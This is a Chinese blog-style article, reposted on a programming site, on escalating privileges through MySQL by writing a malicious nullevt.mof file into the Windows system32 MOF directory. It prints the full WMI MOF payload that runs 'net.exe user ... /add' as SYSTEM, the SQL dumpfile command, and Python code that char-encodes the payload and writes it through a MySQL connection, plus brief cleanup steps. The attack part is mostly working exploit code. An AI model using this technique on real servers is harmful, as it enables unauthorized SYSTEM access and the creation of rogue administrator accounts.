关于mysql mof提权研究

2024-04-02 19:55

短信预约 -IT技能 免费直播动态提醒

无意中看到有关mysql的这种提权方式，趁着有空余时间便研究了起来，发现网上有挺多地方写的不够详细的，研究的时候也卡壳了一段时间。

利用前提：

操作系统为windows
操作系统版本不宜太高，2008测试不通过，2003可（因为需要访问到system32中目录）或说mysql启动身份具有权限去访问和写入c:/windows/system32/mof目录
数据库为mysql且知道mysql登录账号密码和允许外连（或存在sql注入或webshell中操作，未实践）

先简单介绍一下原理（摘自网上和个人实践后得出）

放置在c:/windows/system32/mof目录下的nullevt.mof文件每个五秒钟会被自动执行并且消失，如果后续没有创建新的该文件，那么每五秒会循环执行之前的nullevt.mof中内容，那么只需要将恶意代码写入该文件中即可。

网上已公开nullevt.mof中的利用代码

#pragma namespace(“\\\\.\\root\\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user xxx xxx /add\”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

常规利用过程步骤如下：

上传该文件到服务器上任意位置，名字任意
通过mysql语句 select load_file(上传的文件路径) into dumpfile 'c:/windows/system32/mof/nullevt.mof'

即可，如果成功上传，经过一段时间后，里面嵌入的代码会被执行

个人觉得要上传文件显得过于麻烦，能不能直接select 'xxxxx' into，经过尝试，要将该内容进行转码后再查询即可，提供部分py代码作为演示

使用mysql中char函数解决

payload = r'''
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
 {
 EventNamespace = "Root\\Cimv2";
 Name = "filtP2";
 Query = "Select * From __InstanceModificationEvent "
 "Where TargetInstance Isa \"Win32_LocalTime\" "
 "And TargetInstance.Second = 5";
 QueryLanguage = "WQL";
 };

instance of ActiveScriptEventConsumer as $Consumer
 {
 Name = "consPCSV2";
 ScriptingEngine = "JScript";
 ScriptText =
 "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user xxxx xxx /add\")";
 };

instance of __FilterToConsumerBinding
 {
 Consumer = $Consumer;
 Filter = $EventFilter;
 };
'''

ascii_payload = ''

for each_chr in payload:
    ascii_payload += str(ord(each_chr)) + ','

ascii_payload = ascii_payload[:-1]

cur = conn.cursor()
sql = "select char(%s) into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'" % ascii_payload
cur.execute(sql)

由于mof是由system执行，所以权限满足创建用户、添加管理员等操作，即可完成提权过程。

如果服务器发现被使用mof提权，该如何解决循环创建用户？

打开cmd使用以下命令

net stop winmgmt

删除文件夹下内容 c:/windows/system32/wbem/repository

net start winmgmt

即可

错误之处，敬请指正

免责声明：

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的，并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据，供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

阅读原文内容投诉

关于mysql mof提权研究

下载Word文档到电脑，方便收藏和打印～

下载Word文档

关于mysql mof提权研究

关于mysql mof提权研究

相关文章

猜你喜欢

关于mysql mof提权研究

深入研究MySQL的自动提交功能

如何进行MySQL Stmt预处理提高效率问题的研究

关于mysql中root权限丢失的问题

热门标签

编程热搜

Oracle Study--Oracle RAC CacheFusion（MindMap）

报表SQL

[mysql]mysql8修改root密码

MySQL专题3之MySQL管理

linux怎么查看mysql版本号

navicat导出csv乱码的方法

Mongodb数据库中mongostat工具用法

mysql如何查看帮助

navicat如何设置外键

centos7如何查看mysql的版本

编程资源站

2021年下半年软考高级信息系统项目管理师高频考点精选资料

2021下半年软考高级信息系统技术知识点记忆口诀精选资料

2021下半年软考《信息系统项目管理师》考试真题及答案精选资料

2021下半年软考高级考试备考攻略精选资料

2021年软考高级《信息系统项目管理师》巩固练习题汇总精选资料

2021下半年软考高级信息系统项目管理师30个易考知识点汇总精选资料

2021下半年软考高级知识点这样记，还担心记不住吗精选资料

2021年下半年软考高级考试重点汇总精选资料

2021下半年软考高级信息系统项目管理师计算公式汇总精选资料

2021年下半年软考高级《信息系统项目管理师》模拟试题精选资料

信息系统项目管理师选择题每日一练（2024）历年试题

2023年下半年信息系统项目管理师综合知识真题演练历年试题

目录

关于mysql mof提权研究

关于mysql mof提权研究

相关文章

猜你喜欢

关于mysql mof提权研究

深入研究MySQL的自动提交功能

如何进行MySQL Stmt预处理提高效率问题的研究

关于mysql中root权限丢失的问题

热门标签

编程热搜

编程资源站

目录

感谢您的提交，我们服务专员将在30分钟内给您回复